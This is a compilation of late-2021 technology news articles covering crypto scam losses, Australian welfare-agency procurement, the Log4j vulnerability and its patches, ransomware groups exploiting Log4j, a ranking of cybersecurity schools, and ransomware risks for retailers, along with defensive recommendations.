Information Technology

Cryptocurrency-based scammers and cyber criminals netted a whopping $7.7 billion worth of cryptocurrency from victims in 2021, marking an 81% rise in losses compared to 2020, according to blockchain analysis firm, Chainalysis.  Some $1.1 billion of the $7.7 billion in losses were attributed to a single scheme which allegedly targeted Russia and Ukraine, it said. 

ZDNet Recommends

“As the largest form of cryptocurrency-based crime and one uniquely targeted toward new users, scamming poses one of the biggest threats to cryptocurrency’s continued adoption,” said Chainalysis.SEE: Hackers are turning to this simple technique to install their malware on PCsAt the same time though, the number of deposits to scam addresses fell from just under 10.7 million to 4.1 million, which it said could mean there were fewer individual scam victims – but they are losing more.A major source of rising cryptocurrency losses in 2021 were so-called “rug pulls”, where the developers of a new cryptocurrency vanish and take supporters’ funds with them. Rug pulls accounted for 37% of all cryptocurrency scam revenue in 2021, totaling $2.8 billion – up from just 1% in 2020. “Rug pulls are prevalent in DeFi because with the right technical know-how, it’s cheap and easy to create new tokens on the Ethereum blockchain or others and get them listed on decentralized exchanges (DEXes) without a code audit,” it warned. 

The characteristics of the investment scam networks are changing. Chainaylsis found that the number of active financial scams rose from 2,052 in 2020 to 3,300, while their individual lifespan has decreased from over 500 days in 2016 to 291 days in 2020 and just 70 days in 2021.     “Previously, these scams may have been able to continue operating for longer. As scammers become aware of these actions, they may feel more pressure to close up shop before drawing the attention of regulators and law enforcement,” it said.SEE: Dark web crooks are now teaching courses on how to build botnetsUnsurprisingly, scams also increase in line with the rise in value of popular cryptocurrencies such as Ethereum and Bitcoin, although that link may have been broken in the last year. Chainalysis notes: “The most important takeaway is to avoid new tokens that haven’t undergone a code audit. Code audits are a process through which a third-party firm analyzes the code of the smart contract behind a new token or other DeFi project, and publicly confirms that the contract’s governance rules are iron clad and contain no mechanisms that would allow for the developers to make off with investors’ funds.”It added: “Investors may also want to be wary of tokens that lack the public-facing materials one would expect from a legitimate project, such as a website or white paper, as well as tokens created by individuals not using their real names.” More

A demonstration of Cellebrite technology being used.
Image: Getty Images
Services Australia has rejected a senator’s request to disclose its contract with Cellebrite for the company to provide technology to help prevent criminal activity. Cellebrite, an Israeli digital intelligence company, is best known for its controversial phone-cracking technology, which it previously claimed could download most data from almost any device on behalf of government agencies. During Senate Estimates in October, Greens Senator Janet Rice had asked Services Australia various questions about the agency’s decision to procure vendor services from Cellebrite, with a request to see a copy of the Cellebrite contract being among them. Services Australia at the time took that request on notice. Rice had also asked about the scope of Services Australia’s usage of the Cellebrite technology, which Services Australia acting-deputy CEO of payments and integrity Chris Birrer said has only been used in fraud and identity theft cases, such as when people have falsely claimed the government disaster relief payments, uploaded false information to commit fraud, and stolen the identities of actual customers to hijack payments. Birrer added that his agency does not deploy these capabilities in relation to any general payment accuracy compliance activities. In providing a response to Rice’s request for the Cellebrite to be disclosed, Services Australia said disclosure of the requested documents would be contrary to the public interest as it would prejudice its criminal intelligence and investigation functions, and not be consistent with the agency’s commercial interests.

“Specifically, disclosure of the agency’s lawful methods or procedures for preventing, detecting, investigating, or dealing with matters arising out of breaches or evasions of the law would, or would be reasonably likely to, undermine the effectiveness of those methods or procedures,” Services Australia said in its response. “Disclosure would also reveal commercially sensitive information provided to the agency in confidence by Cellebrite, potentially causing the agency to be in breach of its contractual obligations, and commercially disadvantaging the Cellebrite in the marketplace.” Social Services hires Deloitte to assess Cashless Debit Card efficacyAs part of the responses to Senate Estimate questions taken on notice, Rice and Labor Senator Malarndirri McCarthy also received responses from the Department of Social Services about its progress in analysing the efficacy of the Cashless Debit Card program (CDC). The CDC, which kicked off in 2016 as a trial, governs how some individuals in receipt of welfare spend their money, with the idea behind the program being to both prevent the sale of alcohol, cigarettes, and some gift cards and block the funds from being used on activities such as gambling. The program has repeatedly been labelled as racist by the Opposition as it has disproportionately impacted Indigenous Australians. Labor Senators have also said there is no evidence that compulsory, broad-based income management actually works. In one of the responses, Social Services revealed most of its advertising of the CDC program in the Northern Territory, which is where most of the program trials have taken place, was put towards ads on 13 Indigenous radio stations, while only placed three regional and two national/metro radio stations received ads, respectively.To address concerns about the CDC’s efficacy, Social Services also revealed in responses to questions on notice that it has paid Deloitte AU$675,000 to undertake data repository services of the CDC program. This will entail analysing CDC data to provide a more complete evidence base of the program’s success and inform policy decisions for the future of the program. The department said the data that will be considered relates to changes in social harm and a range of data relating to social security, drug and alcohol use, gambling, financial management, child protection, police records relating to drug and alcohol-related crime, domestic violence hospital admissions, employment and training, and education data. The procurement of Deloitte’s services follows the Australian National Audit Office (ANAO) announcing last month it would commence a follow-up audit into the effectiveness of the CDC program. The federal auditor is conducting another audit as Social Services did not have an adequate program for monitoring and evaluation CDC program’s effectiveness, which meant it was difficult to conclude whether the program helped reduce social harm or whether the card was a lower cost welfare quarantining approach. At the moment, CDC card providers like Indue are being paid AU$1,100 per participant in the program. In total, the federal government has paid AU$70 million to Indue since the program commenced. Related Coverage More

Singapore has held emergency meetings with critical information infrastructure (CII) sectors to prepare them for potential threats stemming from the Log4j vulnerability. The country’s cybersecurity agency has issued alerts on the Apache Java logging library flaw and is “closely monitoring” developments.  The first alert had gone out on Dec 14, with Singapore’s Cyber Security Agency (CSA) warning that the “critical vulnerability”, when exploited successfully, could allow attackers to gain full control of affected servers. It noted that there was only a short window to deploy mitigation measures and organisations should do so quickly.  It said alerts were sent out to CII sector leads and businesses, instructing them to immediately patch their systems to the latest version. The government agency also was working with these CII representatives to roll out mitigation measures. 

more coverage

Singapore’s cybersecurity bill covers 11 critical information infrastructure (CII) sectors, which enables the relevant local authorities to take proactive measures to protect these CIIs. The bill outlines a regulatory framework that formalises the duties of CII providers in securing systems under their responsibility, including before and after a cybersecurity incident had occurred. These 11 “essential services” sectors include water, healthcare, energy, banking and finance, and aviation. No reports of Log4j-related breaches had been reported at the time when CSA issued its December 14 alert.  CSA on Friday issued another update, raising the alert on the security flaw. It noted that because Log4j was widely used by software developers, the vulnerability could have “very serious consequences”.  “The situation is evolving rapidly and there have already been numerous observations of ongoing attempts by threat actors to scan for and attack vulnerable systems,” the government agency said. “There have been two emergency meetings by CSA with all the CII sector leads to issue directions and technical details and heighten monitoring for unusual activities.”

A briefing session also was held on Friday with trade associations and chambers to highlight the severity of the Log4j vulnerability and urgency for all organisations, including small and midsize businesses (SMBs), to immediately deploy mitigation measures.  In its advisory on dealing with the library flaw, Singapore CERT cautioned that some previous stop-gap measures were no longer recommended as they were determined to be insufficient. These included configuring the system property to true or modifying the logging configuration to disable message lookups.   Users who were unable to upgrade to versions 2.16.0 or 2.12.2–or Java 8 and Java 7, respectively–should disable lookups by removing the jndiLookup class from the log4j-core jar file, SingCERT advised.  It added that users of products with Log4j should implement the latest patch, especially those using Apache Log4j with affected versions between 2.0 and 2.14.1. They also should beef up monitoring for unusual activities and review their system logs.  Software developers that tapped Log4j in their products should identify and develop patches for affected products as well as notify users of these products to prioritise the deployment of software updates.  CSA said it was in contact with other international agencies and computer emergency response teams (CERTs) of Asean member states, to share information on the latest developments on Log4j.  It urged organisations affected by the vulnerability to report to SingCERT should they uncover evidence of any compromise.  The US Cybersecurity and Infrastructure Security Agency on Friday also sent out an emergency directive, requiring federal civilian departments and agencies  to  immediately patch their internet-facing network assets for Apache Log4j vulnerabilities.  RELATED COVERAGE More

Apache has released version 2.17.0 of the patch for Log4j after discovering issues with their previous release, which came out on Tuesday. Apache said version 2.16 “does not always protect from infinite recursion in lookup evaluation” and explained that it is vulnerable to CVE-2021-45105, a denial of service vulnerability. They said the severity is “high” and gave it a CVSS score of 7.5.”Apache Log4j2 versions 2.0-alpha1 through 2.16.0 did not protect from uncontrolled recursion from self-referential lookups. When the logging configuration uses a non-default Pattern Layout with a Context Lookup (for example, $${ctx:loginId}), attackers with control over Thread Context Map (MDC) input data can craft malicious input data that contains a recursive lookup, resulting in a StackOverflowError that will terminate the process. This is also known as a DOS (Denial of Service) attack,” Apache explained. They added that the latest issue was discovered by Akamai Technologies’ Hideki Okamoto and an anonymous vulnerability researcher.Mitigations include applying the 2.17.0 patch and replacing Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC) in PatternLayout in the logging configuration. Apache also suggested removing references to Context Lookups in the the configuration like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.They noted that only the Log4j-core JAR file is impacted by CVE-2021-45105. On Friday, security researchers online began tweeting about potential issues with 2.16.0, with some identifying the denial of service vulnerability. 

Discussion about Log4j has dominated conversation all week. CISA released multiple advisories mandating federal civilian agencies in the US apply patches before Christmas while several major tech companies like IBM, Cisco and VMware have raced to address Log4j vulnerabilities in their products. Security company Blumira claims to have found a new Log4j attack vector that can be exploited through the path of a listening server on a machine or local network, potentially putting an end to the assumption that the problem was limited to exposed vulnerable servers.Other cybersecurity firms have found that major ransomware groups like Conti are exploring ways to take advantage of the vulnerability. Google released a security report on Friday where Open Source Insights Team members James Wetter and Nicky Ringland said they found that 35,863 of the available Java artifacts from Maven Central depend on the affected Log4j code. This means that more than 8% of all packages on Maven Central have at least one version that is impacted by this vulnerability, the two explained. “The average ecosystem impact of advisories affecting Maven Central is 2%, with the median less than 0.1%,” Wetter and Ringland said. So far, nearly 5,000 artifacts have been patched, leaving more than 30,000 more. But the two noted that it will be difficult to address the issue because of how deep Log4j is embedded in some products. 
Google
“Most artifacts that depend on log4j do so indirectly. The deeper the vulnerability is in a dependency chain, the more steps are required for it to be fixed. For greater than 80% of the packages, the vulnerability is more than one level deep, with a majority affected five levels down (and some as many as nine levels down),” Wetter and Ringland wrote.”These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first.”The two went on to say that after looking at all publicly disclosed critical advisories affecting Maven packages, they found less than half (48%) of the artifacts affected by a vulnerability have been fixed, meaning it may take years for the Log4j issue to be solved. More

Are you a career-focused professional searching for the best cybersecurity programs? Discover several of the top colleges and universities with affordable tuition and impressive academic reputations.Consider college and program-specific grants, scholarships, and work-study jobs as well as education awards and other financial aid resources.When selecting the best programs, research each school’s accreditation, recruitment and enrollment efforts, and full-time and part-time graduation and retention rates, along with online degree options.
Best cybersecurity schools and programsThe data for this list was collected from the Integrated Postsecondary Education Data System and College Scorecard datasets.While several schools achieved high rankings, the following list draws from a subset of top-rated, regionally accredited schools and historically Black colleges and universities. Rankings were based on many factors such as computer science scholarships, online cybersecurity degree options, and affordable tuition and fees.Several top-rated colleges and universities have been listed. The data is accurate as of time of publication. Prior to enrollment, prospective students are encouraged to check the school’s websites and terms and conditions.1.  Bentley University

Bentley University’s cybersecurity risk management certificate offers students and working professionals experience in information security. Prospective students can earn a CompTIA, ISACA, Cloud Security Alliance, or (ISC)2 certification. Students pay $9,900 for the certificate program and prepare for certification exams. The university ranks first for career services and promotes diversity-related initiatives.2.  Bowie State UniversityBowie State University offers a graduate certificate, bachelor’s, and advanced computer science degrees with a cybersecurity specialization. Students may earn a computer technology bachelor’s degree in alpha and beta testing, cloud computing, and other related specializations. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education and a top five institution for African American technology graduates.
3.  Butler UniversityButler University offers students and working professionals a four-module cyber risk management certificate. This self-paced program is $1,995 and may be completed in 3 to 10 hours. Students will gain program-specific experience in understanding pure risk and cyber risk, identifying third party errors and omissions, and interpreting cyber risk insurance policies along with other relevant industry skills.4. Carroll CollegeCarroll College offers a free, online three-stage cyber fast track program in cybersecurity in which students gain in-depth, foundational knowledge of cybersecurity. Once mastered, students proceed with master forensics, intrusion detection, and security operations along with system and network penetration testing and application testing. The college awards three Women in Cybersecurity Scholarships to undergraduate and graduate students.5.  Champlain College OnlineChamplain College offers students an online cybersecurity bachelor’s degree. The program is 120 credit hours and entirely online. Students commit 10 to 17 hours of course study. The university is recognized as a National Center of Academic Excellence in Cyber Defense Education. The college has ranked among the most affordable online cybersecurity bachelor’s degrees.6.  Howard University Howard University offers a 15 credit hour cybersecurity graduate certificate. This program includes both computer science and engineering coursework. Students complete a year-long cybersecurity course, two technical courses, and a capstone project. Students may select database systems and security, wireless network security, or advanced operating systems and security to satisfy technical courses.7.  Kennesaw State UniversityKennesaw State University offers an online cybersecurity bachelor’s and master’s degree. The 30-credit cybersecurity master’s program can be completed within a year. This program is suitable for both career changers and working professionals seeking career advancement. In 2019, the university ranked in the top 50 and 60 for business and information technology and engineering.8.  North Carolina A&T State UniversityNorth Carolina A&T offers an online, 12-credit hour post-baccalaureate cybersecurity certificate. Prospective students are required to take information privacy and security or advanced security applications along with a computer system security or network security course. For technical courses, students may choose from software security testing, principles of computer networking, and related computer science and technology courses.9. University of Illinois at Urbana-ChampaignThe University of Illinois at Urbana-Champaign offers a three course certificate in cybersecurity. Prospective students may compete in an approved cybersecurity competition, serve as an undergraduate researcher, or participate in the Illinois Cyber Security Scholars Program to meet the extracurricular requirement. While completing the certificate program, students attend an Information Trust Institute certificate program meeting.10.  Virginia TechVirginia Tech offers an online, 12-week cyber bootcamp. Prospective students may enroll in the computer engineering bachelor’s program with a cyber operations track, cybersecurity management and analytics business degree, or computer engineering major in networks and cybersecurity program. The university offers a Cybercorps Scholarship for Service and master’s programs with cybersecurity tracks.  More

Researchers with security firm Advanced Intelligence have discovered the Conti ransomware group exploiting VMware vCenter Server instances through the Log4j vulnerabilities. In a report on Friday, the security company said it discovered multiple members of Conti discussing ways to take advantage of the Log4j issue, making them the first sophisticated ransomware group spotted trying to weaponize the vulnerability. AdvIntel said the current exploitation “led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J2 exploit.” “Most importantly, AdvIntel confirmed that the criminals pursued targeting specific vulnerable Log4J2 VMware vCenter for lateral movement directly from the compromised network resulting in vCenter access affecting US and European victim networks from the pre-existent Cobalt Strike sessions,” the researchers said. They noted that their research of ransomware logs shows Conti made over $150 million in the last six months. AdvIntel laid out a timeline of events for Conti’s interest in Log4j starting on November 1, when the group sought to find new attack vectors. Throughout November, Conti redesigned its infrastructure as it sought to expand and by December 12, they identified Log4Shell as a possibility. By December 15, they began actively targeting vCenter networks for lateral movement. 
Advanced Intelligence
In a statement, VMware said it issued a security advisory containing fixes for the 40 products it sells that are vulnerable to the Log4J issue, including vCenter. In the advisory they confirm that exploitation attempts in the wild have been confirmed. 

“Any service connected to the internet and not yet patched for the Log4j vulnerability (CVE-2021-44228) is vulnerable to hackers, and VMware strongly recommends immediate patching for Log4j,” VMware said.AdvIntel added that it is only a matter of time until Conti and other groups will begin exploiting Log4j to its full capacity. Khonsari was the first ransomware group to begin targeting Log4j but was considered lower grade and did not even have a viable ransom note, leading some to consider it simply a wiper. Researchers in China have identified the TellYouThePass ransomware being used in attacks against Windows and Linux devices using the Log4j issue. Recorded Future ransomware expert Allan Liska said the most recent news about different ransomware groups exploring exploitation of Log4j lined up with what he is seeing.”IABs working with Conti have started scanning for Log4Shell and likely have exploited victims. BUT we have not seen any evidence of a successful ransomware attack resulting from these scans yet. Doesn’t mean it hasn’t happened, just we haven’t seen it,” Liska said.  More

US online holiday sales grew by 30% in 2020, and Forrester forecasts that it will grow another 10% year over year in 2021. This growth raises the stakes for retail professionals to support the increased demand, which ultimately makes them a prime target for ransomware attackers. Why should retailers pay attention to ransomware preparedness? Ransomware attackers target organizations that need as close to 100% uptime as possible, since those businesses will feel the effects of a ransomware attack more viscerally and are more likely to pay a ransom quickly. Retailers and their providers fall right into this bucket: They rely on continuously running production, they must serve consumers constantly, and they often utilize just-in-time manufacturing. Furthermore, they often have several third-party dependencies they can’t disappoint and complex supply chains to manage. Every aspect of the retail supply chain is a potential target of attack. Since the holiday season guarantees retailers an increase in traffic and more emotionally-charged purchases, the incentive for ransomware groups to attack them is exacerbated now more than ever. Below, we provide a primer on ransomware attacks and how they can affect retailers. What is ransomware? Ransomware is a type of malicious software designed to block access to a computer system until a sum of money is paid. It’s been used in very public attacks, like the one on Colonial Pipeline earlier this year, and attacks on hospital systems. This type of attack has become more common in part because of the emergence of ransomware-as-a-service (RaaS). RaaS is where attackers sell access to ransomware software as though they were operating a business, fully outfitted with salespeople, developers, managers, and marketers. They operate as a typical startup and sell access to their “product” on the dark web to cybercriminals who do not want to develop their own ransomware but still want to use it and get the payout. How does ransomware affect retailers? Ransomware attacks affect every aspect of the retail supply chain, especially in these five areas: suppliers, logistics, operations, products, and websites. Below are descriptions of how ransomware can affect each of these and real-world examples. 

Suppliers When ransomware attackers target suppliers, it often results in machines in factories being disabled or employees being locked out of critical supply systems. Once most suppliers discover a ransomware attack, the de facto response to contain the attack is to shut down facility operations indefinitely. This results in production bottlenecks, and customers scramble to use their alternative supplier. This kind of attack struck JBS Foods this year, shutting down its slaughterhouse for an entire day. To add insult to injury, JBS had to shell out $11 million in Bitcoin ransom to get its systems back. To gauge the resilience of your suppliers in a crisis, we recommend using The Forrester Supplier Resilience Assessment Tool. Logistics Logistics firms are targeted by ransomware groups because of their just-in-time business models and the complex interconnectedness of their IT systems. Ransomware attacks on these targets quickly infect computer systems throughout the network to encrypt as many devices as possible and render the firm inoperable. This happened over the past few years with CMA CGM, FedEx, and Maersk, which all halted operations and suffered millions in revenue loss. Operations When ransomware infiltrates a brick-and-mortar store, it tries to infect point-of-sale systems, employee tools, store printers — whatever it can get its hands on. These attacks can prevent customer transactions or even force stores to close. More detrimental for the brand is the risk that your customers will witness an attack unravel your operations in real time. For example, Cencosud was made aware of a ransomware attack hitting their systems when POS printers spewed out ransomware notes in its stores. Products Digital products such as e-readers, tablets, video gaming systems, and others are also susceptible to ransomware attacks. When hit, these devices may appear inoperable while the attacker steals company and customer data. This situation can be very detrimental for customers and organizations. When devices mysteriously stop working, customers often take to social media to air their grievances. This inevitably affects the external image of the brand and public perception of your product’s efficacy. When Barnes & Noble’s NOOK e-reader was attacked with ransomware, customers lost access to their libraries, purchases, and accounts — and complained on Facebook and Twitter as a result. Websites Ransomware attackers often look to target public assets — especially ones retailers rely on, like e-commerce websites. If your website shuts down from a ransomware attack, customers lose access to you, which may confuse or frustrate them and leave them concerned about the safety of their data. Last year, X-Cart’s e-commerce hosting site was corrupted, locking out store owners from their own websites and preventing customers from accessing them for days. How can you protect against ransomware attacks this holiday season? Protecting against ransomware attacks is something every single employee can participate in. Both during the holiday season and as you plan for your 2022 operations, the top three things we recommend to promote ransomware defenses among your employees are: Keep your team informed about the implications of a ransomware attack, especially around high-traffic times like the holidays. Make sure they know what ransomware is and are on the lookout for any signs of a potential ransomware attack. Get your employees to gamify finding phishing attacks and reporting them to your security team. Phishing attacks are one of the main ways cybercriminals start their attacks, so the more awareness you can spread about this attack vector, the better. Work with the security team to simulate what you would do in the event of a ransomware attack. Having a plan in place for how to respond when a ransomware attack happens is critical to having a quick and complete recovery. This blog post is part of Forrester’s holiday 2021 series, read more here.This post was written by Analyst Allie Mellen and it originally appeared here. More

It doesn’t rain, but it pours. Previously, one assumption about the 10 out of 10 Log4j security vulnerability was that it was limited to exposed vulnerable servers. We were wrong. The security company Blumira claims to have found a new, exciting Log4j attack vector.

more coverage

You didn’t really want to take this weekend off, did you? Of course not! Instead, you’ll be chasing down vulnerable Log4j code ever deeper into your network. According to Blumira, this newly-discovered Javascript WebSocket attack vector can be exploited through the path of a listening server on their machine or local network. An attacker can simply navigate to a website and trigger the vulnerability. Adding insult to injury, WebSocket connections within the host can be difficult to gain deep visibility into. That means it’s even harder to detect this vulnerability and attacks using it.This vector significantly expands the attack surface. How much so? It can be used on services running as localhost, which are not exposed to a network. This is what we like to call a “Shoot me now” kind of problem. Oh, and did I mention? The client itself has no direct control over WebSocket connections. They can silently start when a webpage loads. Don’t you love the word “silently” in this context? I know I do. WebSockets, for those of you who aren’t web developers, are in almost all modern web browsers. They’re commonly used for two-way communication functions such as website chat and alerts. They’re great at passing timely information back to the browser and allowing the browser to quickly send data back and forth. However, WebSockets have their own security risks. WebSockets aren’t restricted by same-origin policies like a normal cross-domain HTTP request. Instead,  they expect the webserver to validate a request’s origin. In short, they don’t come with much in the way of built-in security measures.As you’d guess from this, WebSockets have been used in attacks before. WebSockets have been used to attack cable modems by sending malicious requests. It’s also used by hackers for host fingerprinting and port scanning.

In their proof-of-concept attack, Blumira found that by using one of the many Java Naming and Directory Interface (JNDI) exploits that they could trigger via a file path URL using a WebSocket connection to machines with an installed vulnerable Log4j2 library. All that was needed to trigger success was a path request that was started on the web page load. Simple, but deadly. Making matters worse, it doesn’t need to be localhost. WebSockets allow for connections to any IP. Let me repeat, “Any IP” and that includes private IP space.Next, as the page loads, it will initiate a local WebSocket connection, hit the vulnerable listening server, and connect out over the identified type of connection based on the JNDI connection string. The researchers saw the most success utilizing Java Remote Method Invocation (RMI). default port 1099., although we are often seeing custom ports used. Simply port scanning, a technique already in the WebSocket hacker handbook,  was the easiest path to a successful attack. Making detecting such attacks even harder, the company found “specific patterns should not be expected as it is easy to trigger traffic passively in the background.”Then, an open port to a local service or a service accessible to the host is found, it can then drop the JNDI exploit string in path or parameters. “When this happens, the vulnerable host calls out to the exploit server, loads the attacker’s class, and executes it with java.exe as the parent process.” Then the attacker can run whatever he wants. Indeed, they already are. As Anurag Gurtu, StrikeReady’s chief product officer, observed, “Apparently, a ransomware attack is currently exploiting the Log4Shell vulnerability. It’s the Khonsari ransomware gang that has built an attack using C# and the .NET framework. After execution, the malware enumerates all mounted drives (other than C:/) and targets user directories including Documents, Videos, Pictures, Downloads, and Desktop. An AES 128 CBC algorithm is used for encryption, and the files are saved with a .khonsari extension.”They’re not the only ones. State-sponsored hackers from China, Iran, North Korea, and Turkey; Cobalt Strike; and many others are also exploiting Log4j vulnerabilities. This latest vulnerability simply opens the doors even wider for would-be attackers. It will only get worst before it gets better For as Sophos senior threat researcher Sean Gallagher recently explained to date, Log4Shell attackers have been focused on cryptomining, but this is just a “lull before the storm.”He continued, “We expect adversaries are likely grabbing as much access to whatever they can get right now… to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems.” After all, Gallagher concluded, “This vulnerability can be everywhere.”What can you do about this? Blumira suggests the following:Update all local development efforts, internal applications, and internet-facing environments to Log4j 2.16 as soon as possible, before threat actors can weaponize this exploit further. This includes moving any custom applications in their dependency manifests to 2.16 as soon as possible to avoid incidental exploitation. You should also look closely at your network firewall and egress filtering. The mission here is to restrict the callback required for the actual exploit to land. Significantly limiting the egress traffic of your endpoints will reduce the risk as you patch your applications. In particular, make sure that only certain machines can send out traffic over 53, 389, 636, and 1099 ports.  All other ports should be blocked. Finally, since weaponized Log4j applications often attempt to call back home to their masters over random high ports, you should block their access to such ports. Good luck, get back to work hunting down Log4j libraries and calls and hope that you get as much of your infrastructure as you can batten down before the holidays. Related stories: More